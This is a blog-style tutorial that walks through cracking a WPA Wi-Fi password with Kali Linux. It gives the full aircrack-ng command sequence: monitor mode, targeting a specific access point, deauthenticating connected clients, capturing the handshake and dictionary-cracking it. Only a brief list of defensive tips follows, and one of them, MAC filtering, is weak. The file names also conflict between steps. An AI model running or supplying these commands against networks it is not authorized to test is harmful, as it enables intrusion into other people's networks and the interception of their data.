What is Wi-Fi hacking?
Essentially, Wi-Fi hacking is cracking the security protocols in a wireless network, granting complete access for the hacker to view, store, download, or abuse the wireless network. With all the information gathered from your compromised Wi-Fi, hackers can use your information for their own personal requirements.
How do Wi-Fi hacking works?
This technique functions in the following way:
- Primarily, we will be going to discover targeted Wi-Fi (Access Point) through monitoring the Wi-Fi signals.
- Then, it is essential on our part to send de-authentication packets to the AP which will compel the clients connected to the access point to obtain disconnect from the AP.
- When the client will attempt to reconnect to the AP, we will grab the 4-way handshake file which comprises the password in encrypted form.
- After that, to get the password, we will be going to use aircrack-ng to crack the handshake file
Prerequisites to hack a Wi-Fi password
- Make sure you have Kali installed on your computer or installed as dual-boot or just run kali as live Operating System and you are in the range of Wi-Fi on which you intent to carry out the attack.
- Make sure you have an external Wi-Fi adapter that supports packet injection and monitor mode, If you want to use a virtual machine.
- If you don’t have an external Wi-Fi adapter, install kali as dual-boot on your PC or laptop.
Steps of hacking Wi-Fi password using kali?
The following steps will help you crack a Wi-Fi password using kali.
1. Open the terminal window in Kali
Use keyboard shortcut Ctrl+alt+t or type terminal in the search box to open a terminal window in Kali.
2. Put your Wi-Fi adaptor into monitor mode
You are required to know first the name of your Wi-Fi adaptor before putting your Wi-Fi into monitor mode and for that type in the following command in the terminal.
ifconfig
I am going to perform all the following commands on this adaptor as you can see, I have a single Wi-Fi adaptor(wlan0).
Now to put this adaptor into monitor mode type the subsequent command in the terminal.
airmon-ng start wlan0
While your Wi-Fi is in monitor mode, notice that you can’t use your internet. And my adeptor name is changed from wlan0 to wlan0mon.
We are required to kill background processes, before we start monitoring Wi-Fi signals. So that they will not be able to interrupt while we are working in monitoring mode, for that type following command in the terminal window.
airmon-ng check kill
You can start monitoring the Wi-Fi signals near you, after putting your Wi-Fi into monitor mode.
3. Start monitoring Wi-Fi signals
We are going to use airodump-ng command to start monitoring Wi-Fi signals. Just type the subsequent command in the terminal.
airodump-ng wlan0mon
On the upper part of the screen, all the visible access points (APs) are shown and all the clients which are connected to the APs are listed below.
4. Let’s target the AP you want to hack
If you came across your target in the list of visible APs and at least one client connected to that AP, we can go further else you require to wait for somebody to get connected to that AP first.
Now open up a new terminal window (don’t close the present window) because we required to copy bssid and channel from the current window.
Type the following command in the terminal window.
Formet: airodump-ng --bssid <your target bssid> -c <channel no. of your target AP> --write <file name where you want to store hand-shake file> <name of your wifi adptor with mon>
airodump-ng --bssid 64:6C:82:E8:24:EC -c 6 --write HSfile wlan0mon
5. Capture hand-shake
In order to capture the hand-shake which contains the encrypted password, we need to disconnect the connected clients from the AP. For that open new terminal window and type the following command.
aireplay-ng --deauth 10 -a 64:6C:82:E8:24:EC wlan0mon
This command will send 10 de-authentication packets to the AP which will cause the clients to disconnect from the AP.
And when they will try to reconnect to the AP we will get the file containing the encrypted password. As you can see in the following image we got a message saying “WPA Handshake: BSSID of target” this message means our attack is successful, and we are able to capture the handshake file.
We can find a capture file on the location we specified in the 4th step, in my case it’s root/WPfile-01.cap.
6. Decrypt the password
Now, to decrypt the password present in our file WPfile-01.cap, we need to run the following command against this file using a password list, in my case, I am using a custom password list named PasswordList.txt.
aircrack-ng HSfile-01.cap -w PasswordList.txt
How to exit monitoring mode?
Type following command.
airmon-ng stop wlan0mon
service NetworkManager restart
How to secure your wireless network from getting hacked?
- Change your default password
- Increase the length of your password (min 12 characters)
- Introduce some symbols and numbers in your password
- Restrict access to your network by permitting only registered MAC addresses
0 Comments